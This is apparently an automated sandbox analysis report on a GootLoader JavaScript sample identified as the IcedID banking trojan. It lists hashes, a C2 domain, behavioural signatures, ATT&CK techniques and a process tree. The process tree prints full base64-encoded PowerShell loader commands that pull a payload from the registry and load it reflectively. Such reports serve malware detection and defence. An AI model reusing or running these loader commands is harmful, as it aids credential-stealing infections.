icedid | 58105e33f351cfa7bde0c3c4dda630379f0f71ddf8dc2a1ce63ea194607f3551

General

Target

gootloader-payload.js
Size

245KB
MD5

3793a0bc98b744d1ad1a41cad211c08d
SHA1

69d470c25bef8d7185263a8288114db3903979e5
SHA256

58105e33f351cfa7bde0c3c4dda630379f0f71ddf8dc2a1ce63ea194607f3551
SHA512

e18b1f47db6efe21b78c81c05cb18ffbe73e3238a999858331be39a35f1548f975098ff81852f0637e9ee9170c43c0b0d8b63977d805717b7dc9333508a93b74
SSDEEP

1536:WRml64QvRDKbimZOQyXjdBMWxXJUGkJPZF40nuOMdo4JpqU1vmROQxB/Nfr27NV5:ShPnluOo3xBX0iRSMzelxUtIATOCsd

Score

10^/10

icedid 2475032331 banker loader trojan

Malware Config

Extracted

Family

icedid

Campaign

2475032331

C2

zalikomanperis.com

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid

Blocklisted process makes network request 1 IoCs

flow	pid	Process
58	5004	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	wscript.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4060 set thread context of 5004	4060	powershell.exe	103

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
5048	powershell.exe
5048	powershell.exe
4060	powershell.exe
4060	powershell.exe
5004	powershell.exe
5004	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	4060	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 2640 wrote to memory of 5048	2640	wscript.exe	91
PID 2640 wrote to memory of 5048	2640	wscript.exe	91
PID 5048 wrote to memory of 4060	5048	powershell.exe	93
PID 5048 wrote to memory of 4060	5048	powershell.exe	93
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103
PID 4060 wrote to memory of 5004	4060	powershell.exe	103

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\gootloader-payload.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "/"e" M"gA5ADgANwA4ADUAM"QA5AD"UA"OwBzAG"wAZQ"BlAHA"AIAA"tAHMAIAA"3ADE"AO"wAkAGcAawB3AD0A"RwBlAHQ"A"LQBJAH"QAZQB"t"AFAAcgB"vAHA"AZQByAH"QAe"Q"AgAC"0AcABh"AHQAa"AAgACg"AIgBoAGsAIgA"rACIAYw"B"1AD"oAXABz"AG8A"Zg"Ai"ACsAI"gB0A"HcAIgArACI"AYQByAGU"A"XAB"tAGkAYwAiACsAIgBy"AG8AcwAi"ACsAIgBv"A"G"YAdABc"ACI"AK"wBbAEUAb"gB2AGkAcgB"vA"G4"AbQBl"AG"4"A"dABd"A"Do"AOgAoACIAdQB"zAGUAIg"Ar"A"CI"A"c"gBuAC"IA"K"w"Ai"A"GEAbQ"Bl"ACIAKQArACI"A"MAA"iACkAOwBmAG8Ac"gA"gA"Cg"AJA"BjAH"U"APQAwADsAJA"BjAHUAI"AAt"AGwAZ"QAgADcAMQAwADsA"JABj"AHU"A"KwA"rACkAewB"U"AHI"AeQ"B7A"C"QAZgB5"ACsA"PQAkAGcAawB3AC4"AJ"ABjAHU"AfQ"BDAGEAdABjAGgAewB9A"H"0AOwAkAGMAdQA9ADAAOw"B3"AGg"AaQBsAGUA"K"AAkA"HQAc"gB1AGUAKQB"7"ACQ"AY"wB1ACs"AK"wA7ACQAaw"BvA"D0AWwB"tAG"EAdA"BoAF0AOgA6ACgAIgBzAH"E"A"Ig"ArACIAcgB0ACIAKQA"oACQAY"wB1ACkA"OwBpAGYAKAAkAGsAbwAgAC"0A"ZQBxACAAMQAwADAAMA"ApA"H"sAYgB"yAG"UAYQBrAH0A"fQ"Ak"AHEAY"gByA"D0AJ"A"BmAHkALgByAGUAcABs"AGEAYwBlA"CgAI"g"AjACIALAA"kAGsAbwApADsAJA"B"p"A"HkAYQ"A9AFsA"YgB5AHQAZQBbAF0"AXQA6ADoA"KAAiA"G4A"ZQA"iACs"AIgB3A"CIAKQ"AoA"CQAcQ"BiA"H"IA"Lg"BM"AGUAbgBn"AHQAaAAv"A"DI"AKQA7AGYA"bwBy"ACgA"JA"B"jAHU"AP"Q"AwADsAJA"BjAHUAIAA"tAGw"AdAAgACQAcQ"B"iAH"IALgBMAGU"Ab"gB"nA"HQ"Aa"A"A"7ACQ"AYwB1"ACsAPQAyACkAew"AkAGkAeQBh"AFs"AJABjA"H"UA"Lw"AyAF0APQBbAGM"Abw"BuAH"YA"ZQBy"AHQAXQ"A6ADo"A"K"AA"i"A"FQ"Abw"BCACIAKw"AiA"HkAdABl"A"CIAKQAoA"C"Q"AcQB"iAHI"A"LgBTAHUAYgB"zAHQAcgBpA"G"4AZwA"oA"CQ"AY"wB1AC"wAMgAp"ACwAKAAyA"Co"AO"AA"pAC"kAf"QBbAHIAZ"QBm"AGw"A"ZQBjA"HQA"aQB"vA"G4ALgBhA"H"MA"cwBl"AG"0AY"g"BsAH"kA"XQA6AD"o"A"KAAiAEwAbwAiAC"sAI"gBhAGQAIgA"pACgAJABpAHk"AYQApADs"AWwBPAHAAZQBu"AF0"AOgA6ACgA"IgBUAGUAI"gArACIAcwB0ACIAKQAoACkAOw"A5ADYAMQA4ADIAM"AA5ADA"ANwA7A"A==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /e MgA5ADgANwA4ADUAMQA5ADUAOwBzAGwAZQBlAHAAIAAtAHMAIAA3ADEAOwAkAGcAawB3AD0ARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACgAIgBoAGsAIgArACIAYwB1ADoAXABzAG8AZgAiACsAIgB0AHcAIgArACIAYQByAGUAXABtAGkAYwAiACsAIgByAG8AcwAiACsAIgBvAGYAdABcACIAKwBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgAoACIAdQBzAGUAIgArACIAcgBuACIAKwAiAGEAbQBlACIAKQArACIAMAAiACkAOwBmAG8AcgAgACgAJABjAHUAPQAwADsAJABjAHUAIAAtAGwAZQAgADcAMQAwADsAJABjAHUAKwArACkAewBUAHIAeQB7ACQAZgB5ACsAPQAkAGcAawB3AC4AJABjAHUAfQBDAGEAdABjAGgAewB9AH0AOwAkAGMAdQA9ADAAOwB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQB7ACQAYwB1ACsAKwA7ACQAawBvAD0AWwBtAGEAdABoAF0AOgA6ACgAIgBzAHEAIgArACIAcgB0ACIAKQAoACQAYwB1ACkAOwBpAGYAKAAkAGsAbwAgAC0AZQBxACAAMQAwADAAMAApAHsAYgByAGUAYQBrAH0AfQAkAHEAYgByAD0AJABmAHkALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApADsAJABpAHkAYQA9AFsAYgB5AHQAZQBbAF0AXQA6ADoAKAAiAG4AZQAiACsAIgB3ACIAKQAoACQAcQBiAHIALgBMAGUAbgBnAHQAaAAvADIAKQA7AGYAbwByACgAJABjAHUAPQAwADsAJABjAHUAIAAtAGwAdAAgACQAcQBiAHIALgBMAGUAbgBnAHQAaAA7ACQAYwB1ACsAPQAyACkAewAkAGkAeQBhAFsAJABjAHUALwAyAF0APQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAKAAiAFQAbwBCACIAKwAiAHkAdABlACIAKQAoACQAcQBiAHIALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwB1ACwAMgApACwAKAAyACoAOAApACkAfQBbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApACgAJABpAHkAYQApADsAWwBPAHAAZQBuAF0AOgA6ACgAIgBUAGUAIgArACIAcwB0ACIAKQAoACkAOwA5ADYAMQA4ADIAMAA5ADAANwA7AA==
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      PID:5004

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
0ff7e1af4cc86e108eef582452b35523

SHA1
c2ccf2811d56c3a3a58dced2b07f95076c6b5b96

SHA256
62ed8ef2250f9f744852cb67df0286c80f94e26aed646989b76e5b78f2f1f0d0

SHA512
374675fd36cd8bc38acaec44d4cc855b85feece548d99616496d498e61e943fd695fec7c57550a58a32455e8b21b41bafa18cd1dadac69676fff1de1a56da937

Download Submit
memory/4060-136-0x00007FFC52390000-0x00007FFC52E51000-memory.dmp

Filesize
10.8MB

Download
memory/4060-145-0x00007FFC52390000-0x00007FFC52E51000-memory.dmp

Filesize
10.8MB

Download
memory/4060-138-0x00007FFC52390000-0x00007FFC52E51000-memory.dmp

Filesize
10.8MB

Download
memory/5004-139-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/5004-142-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/5004-143-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5004-153-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/5048-137-0x00007FFC52390000-0x00007FFC52E51000-memory.dmp

Filesize
10.8MB

Download
memory/5048-135-0x00007FFC52390000-0x00007FFC52E51000-memory.dmp

Filesize
10.8MB

Download
memory/5048-152-0x00007FFC52390000-0x00007FFC52E51000-memory.dmp

Filesize
10.8MB

Download
memory/5048-133-0x000002B727980000-0x000002B7279A2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing